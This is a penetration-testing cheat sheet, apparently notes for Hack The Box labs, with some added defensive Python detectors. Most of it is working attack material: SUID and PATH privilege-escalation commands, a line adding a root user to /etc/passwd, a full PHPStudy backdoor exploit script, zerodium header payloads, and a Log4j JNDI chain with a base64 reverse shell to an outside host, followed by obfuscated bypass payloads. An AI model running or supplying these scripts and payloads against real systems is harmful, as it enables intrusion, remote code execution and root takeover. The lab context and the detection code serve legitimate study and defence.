Penetration Testing

Penetration Testing (Hack The Box / HTB)

Scanning

  • nmap

    nmap -sC -sV xx.xx.xx.xx -oA src/

    -sC uses the default nmap scripts,

    -sV enumerates service versions,

    -oA writes output in all formats, with src/ as the output location.

    NOTE: if you get an error, add -Pn and wait a while for the result.

Privilege Escalation

SUID privilege escalation (mode 4000)

SUID lets the caller run a file with the identity of the file's owner, so the idea behind SUID privilege escalation is to run a SUID file owned by root: when we run such a file we obtain the root user's identity.

To discover all SUID executables on the system (different commands suit different systems):

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
  • PATH environment variable escalation

    # /home/raj/script/shell has the SUID bit set
    cd /tmp
    echo "/bin/bash" > ps
    chmod 777 ps
    echo $PATH
    export PATH=/tmp:$PATH
    cd /home/raj/script
    ./shell
    whoami
  • find escalation

    # As an ordinary user, go to /tmp and create a new file
    cd /tmp
    touch abcd
    find abcd -exec whoami \;
  • /etc/shadow escalation

    xxd "/etc/shadow" | xxd -r
  • /etc/passwd escalation

    cat /etc/passwd > passwd
    echo "test:abRcsZmlrrKFA:0:0:,,,:/root:/bin/bash" >> passwd
    cp passwd /etc/passwd
    python3 -c 'import pty; pty.spawn("/bin/bash")'
    su - test
  • /usr/bin/nl escalation

    nl /flag

  • /usr/bin/date escalation

    # Use date's -f option to read a file
    /usr/bin/date -f /flag
  • Run commands as another user

    sudo -l (list the special privileges this user has)

    echo password | su userB -c "cat xxx.txt"

  • Root directory not owned by root

    ls -al / (check whether the root directory is owned by someone other than root)

    mv bin bin1
    /bin1/mkdir bin
    /bin1/chmod 777 bin
    /bin1/echo "/bin1/cat /flag" > /bin/umount
    /bin1/chmod 777 /bin/umount
    exit
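The SUID enumeration and the PATH hijack at the start of this section are exactly what a defender audits for. The Python below is an added example, not from the original notes: it lists SUID files the way the find commands do, diffs them against a baseline, and flags PATH entries that are relative or world-writable. BASELINE is a constructed placeholder and the mode_of parameter is an assumption made here so the check can be exercised without touching the filesystem.

```python
import os
import stat

# Constructed baseline of the SUID binaries expected on this host. Build the real
# one on a clean install with the find commands above and store it off the box.
BASELINE = {"/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo",
            "/usr/bin/mount", "/usr/bin/umount"}

def find_suid_files(root="/"):
    """Same result as `find / -perm -4000 -type f`: SUID regular files under root."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat so a symlink is never judged by its target
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return hits

def unexpected_suid(found, baseline=BASELINE):
    """SUID files the baseline does not account for, in discovery order."""
    return [p for p in found if p not in baseline]

def _dir_mode(entry):
    """Mode bits of an existing directory, else None."""
    try:
        st = os.stat(entry)
    except OSError:
        return None
    return st.st_mode if stat.S_ISDIR(st.st_mode) else None

def risky_path_entries(path_value, mode_of=_dir_mode):
    """PATH entries that are relative/empty or world-writable: what the PATH hijack
    above needs (a lookup that reaches a directory anyone can write into)."""
    risky = []
    for entry in path_value.split(":"):
        if not entry.startswith("/"):
            risky.append((entry or "(empty)", "relative"))
            continue
        mode = mode_of(entry)
        if mode is not None and mode & stat.S_IWOTH:
            risky.append((entry, "world-writable"))
    return risky
```

On a live host run `unexpected_suid(find_suid_files())` and `risky_path_entries(os.environ["PATH"])`; the /tmp entry the hijack above prepends shows up as world-writable.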

Internal Network Penetration

  • Discover internal hosts

    for k in $( seq 1 255);do ping -c 1 10.203.113.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done
  • Scan common ports

    EW proxy: ./ew_for_linux64 -s ssocksd -l 9999

    Scan: proxychains3 nmap (scan the common ports)

  • Operations

    Connect to a remote database: proxychains3 mysql -h 10.203.113.33 -u ctf -p

    Launch Firefox: proxychains3 firefox

    Remote desktop: proxychains3 rdesktop 10.203.113.34:3389

Other

  • PHPStudy backdoor vulnerability

    import requests
    import base64
    from random import choice

    USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
    "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
    "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
    "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
    "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
    "Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
    "Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
    ]
    TIME_OUT = 10

    print(r"""
    _____ _ _ _____ _____ _ _ ____ _ _
    | __ \ | | | || __ \ / ____|| | | | | _ \ | | | |
    | |__) || |__| || |__) || (___ | |_ _ _ __| | _ _ | |_) | __ _ ___ | | __ __| | ___ ___ _ __
    | ___/ | __ || ___/ \___ \ | __|| | | | / _` || | | | | _ < / _` | / __|| |/ // _` | / _ \ / _ \ | '__|
    | | | | | || | ____) || |_ | |_| || (_| || |_| | | |_) || (_| || (__ | <| (_| || (_) || (_) || |
    |_| |_| |_||_| |_____/ \__| \__,_| \__,_| \__, | |____/ \__,_| \___||_|\_\\__,_| \___/ \___/ |_|
    __/ |
    |___/
    Usage & e.g. :
    Target Url:
    localhost/flag.php
    Input Your Command:
    phpinfo();
    Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');
    By:Sp4ce
    Have Fun
    """)

    def checkTarget(url):
        # Probe request: Accept-Charset carries base64("phpinfo();")
        poc = {
            "Accept-Charset": "cGhwaW5mbygpOw==",
            "Accept-Encoding": "gzip,deflate"
        }
        try:
            pocRequest = requests.get(url, headers=poc, timeout=TIME_OUT)
            if "phpinfo" in str(pocRequest.content):
                print('[+] Target is vulnerable.')
                return True
            else:
                print('[-] Target is NOT vulnerable.')
                return False
        except Exception:
            print('[-] Looks Like Something Wrong.')
            return False


    def exploit(url, command):
        # command is the base64-encoded PHP code, sent in the Accept-Charset header
        headers = {}
        headers['User-Agent'] = choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        headers['Accept-Charset'] = command
        try:
            request = requests.get(url, headers=headers, timeout=TIME_OUT)
            if request.status_code == 200:
                print('[+] Command Execute Successful.')
                print(request.text)
            else:
                print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except Exception:
            print('[-] Looks Like Something Wrong.\n')


    if __name__ == "__main__":
        while True:
            url = input("Target Url:\n")
            if 'http' not in url:
                url = "http://" + url
            print('[i] Checking Target...')
            if checkTarget(url):
                cmd = input("Input Your Command:\n")
                command = base64.b64encode(cmd.encode('utf-8'))
                exploit(url, command)
  • zerodium backdoor

    List a directory: User-Agentt: zerodiumsystem('ls /');

    Read a file: User-Agentt: zerodiumsystem('cat /flag');
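Both backdoors above carry their payload in a request header: base64-encoded PHP in Accept-Charset for PHPStudy, and a User-Agentt value starting with zerodium for the other. The Python below is an added detector written for these notes, not part of the original script or either backdoor's tooling; it decodes Accept-Charset and looks for PHP code markers, and checks the User-Agentt trigger. The sample requests are constructed.

```python
import base64
import re

# The decoded Accept-Charset is treated as PHP source if it contains one of these;
# a legitimate Accept-Charset is a charset token such as "utf-8", never valid base64.
_PHP_CODE = re.compile(r"<\?php|\b(phpinfo|system|eval|exec|passthru|shell_exec|assert)\s*\(",
                       re.IGNORECASE)

def _headers_lower(headers):
    """Header names are case-insensitive; normalize them once."""
    return {k.lower(): v for k, v in headers.items()}

def phpstudy_payload(headers):
    """PHP code carried in Accept-Charset the way the script above sends it, or None.
    Accept-Encoding is deliberately not required: the header alone is the tell."""
    value = _headers_lower(headers).get("accept-charset", "")
    try:
        code = base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:  # not base64 (e.g. "utf-8"); binascii.Error is a ValueError
        return None
    return code if _PHP_CODE.search(code) else None

def zerodium_payload(headers):
    """The User-Agentt value if it starts with the zerodium trigger, else None."""
    value = _headers_lower(headers).get("user-agentt", "")
    return value if value.lower().startswith("zerodium") else None

def classify_request(headers):
    """List of (finding, payload) tuples for one request's headers."""
    findings = []
    code = phpstudy_payload(headers)
    if code is not None:
        findings.append(("phpstudy-backdoor", code))
    ua = zerodium_payload(headers)
    if ua is not None:
        findings.append(("zerodium-backdoor", ua))
    return findings

# Constructed sample requests (header dicts), not captured traffic
SAMPLE_REQUESTS = [
    {"Accept-Charset": "utf-8", "Accept-Encoding": "gzip, deflate", "User-Agent": "Mozilla/5.0"},
    {"Accept-Charset": "cGhwaW5mbygpOw==", "Accept-Encoding": "gzip,deflate", "User-Agent": "Mozilla/5.0"},
    {"User-Agentt": "zerodiumsystem('ls /');", "User-Agent": "Mozilla/5.0"},
]

def scan_requests(requests):
    """(index, findings) for every request that triggers at least one finding."""
    return [(i, classify_request(h)) for i, h in enumerate(requests) if classify_request(h)]
```

Feed it the header dicts from a reverse proxy or WAF log; the first sample is benign, the second decodes to phpinfo(); and the third carries the zerodium trigger.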

  • log4j2 vulnerability (CVE-2021-44228)

    Steps:

    1. On a VPS, start the listener with JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

      java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" -A "47.xxx.xxx.220"

      # YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny54eHgueHh4LjIyMC8yMzMzIDA+JjE= decodes to bash -i >& /dev/tcp/47.xxx.xxx.220/2333 0>&1, used to spawn a reverse shell
    2. Put the payload into the vulnerable input you found

      ${jndi:ldap:${sys:file.separator}${sys:file.separator}47.xxx.xxx.220:1389${sys:file.separator}ge5udq}

    Reference: Apache Log4j2 vulnerability reproduction - reverse shell

    Bypasses:

    ${jndi:ldap://xxxxxx.dnslog.cn/exp}
    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxxxxx.dnslog.cn/exp}
    ${${::-j}ndi:rmi://xxxxxx.dnslog.cn/exp}
    ${jndi:rmi://xxxxxx.dnslog.cn}
    ${${lower:jndi}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
    ${${lower:${lower:jndi}}:${lower:rmi}://xxxxxx.dnslog.cn/exp}
    ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxxxxx.dnslog.cn/exp}
    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxx.dnslog.cn/exp}
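Every bypass in the list rebuilds the string jndi out of lookups that Log4j resolves before the JNDI one: ${::-j} default values, ${lower:} and ${upper:}, and ${sys:file.separator} in the payload above. The Python below is an added example, not from the original notes: it undoes those lookups innermost-first, the way Log4j evaluates them, and then checks for the ${jndi: prefix, so a WAF signature on the literal text cannot be dodged by the variants shown. Treating env:-style lookups with a default as unresolvable is an assumption made here; the log lines are constructed.

```python
import re

# Innermost ${...} lookup: a body containing no further "${", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(body):
    """Expand one obfuscation lookup; return None to leave any other lookup as is."""
    key, sep, default = body.partition(":-")
    if sep and not key.lower().startswith("jndi"):
        return default  # ${::-j}, ${:-j}, ${env:NOPE:-j}: unresolvable key -> default
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if low == "sys:file.separator":
        return "/"  # the value on Linux, which the payload above relies on
    return None

def normalize(text, max_rounds=50):
    """Expand innermost obfuscation lookups, repeating until nothing changes."""
    def expand(match):
        value = _resolve(match.group(1))
        return match.group(0) if value is None else value
    for _ in range(max_rounds):
        new = _INNER.sub(expand, text)
        if new == text:
            break
        text = new
    return text

def is_jndi_lookup(text):
    """True when the de-obfuscated text still contains a ${jndi:...} lookup."""
    return _JNDI.search(normalize(text)) is not None

def flag_lines(lines):
    """(line number, normalized line) for every input line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines, 1) if is_jndi_lookup(line)]

# Constructed access-log lines (not real traffic); the payloads are the ones listed above
SAMPLE_LOG = [
    '10.0.0.5 "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxxxxx.dnslog.cn/exp}"',
    '10.0.0.7 "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://xxxxxx.dnslog.cn/exp}"',
    '10.0.0.8 "GET / HTTP/1.1" 200 "${jndi:ldap:${sys:file.separator}${sys:file.separator}47.xxx.xxx.220:1389${sys:file.separator}ge5udq}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "build ${project.version}"',
]
```

`flag_lines(SAMPLE_LOG)` reports lines 2 to 4 together with the de-obfuscated payload; the same functions work on header dumps or application logs.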